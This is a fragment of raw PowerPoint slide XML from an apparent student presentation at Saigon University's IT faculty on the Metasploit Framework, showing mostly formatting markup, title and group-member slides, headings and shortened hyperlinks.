              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>jimmi2051@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lý</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thành</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9" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353800" y="6492875"/>
            <a:ext cx="838200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1800" b="0" cap="none" spc="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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11026140" y="6492875"/>
            <a:ext cx="929640" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trang:</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6368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tinyurl.com/ybkyndwn" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/yal2ssgz" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/y73rrbtj" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/y9c3bmx2" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/oskyfjm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide28.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/y8rmdzfk" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/yahq3v9r" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/yd7ze7p7" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/onh3zzn" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/y9wxvups" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/gkpbunx" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/ycnzdmjg" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/y9uypydc" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/y9xkn3p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8599"/>
            <a:ext cx="9144000" cy="1092201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="3600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Trường Đại học Sài Gòn</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" sz="3600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" sz="3600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>KHOA CÔNG NGHỆ THÔNG TIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="360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1524000" y="1654650"/>
            <a:ext cx="9144000" cy="885350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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30"/>
            <a:ext cx="1645920" cy="1645920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200900" y="2873850"/>
            <a:ext cx="4775200" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>viên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nhóm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 7: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lý</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thành</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" smtClean="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arenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thảo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="260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7200900" y="4589262"/>
            <a:ext cx="4775200" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GVHD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Võ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Lam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Giang</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600">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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4133204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1938992"/>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600">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chức </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>năng:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="260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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" smtClean="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38187"/>
            <a:ext cx="3924300" cy="30289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836" y="3398257"/>
            <a:ext cx="3854196" cy="2468880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1818587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2400657"/>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400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thành phần: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="240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sz="240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Jacob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hammack</a:t>
            </a:r>
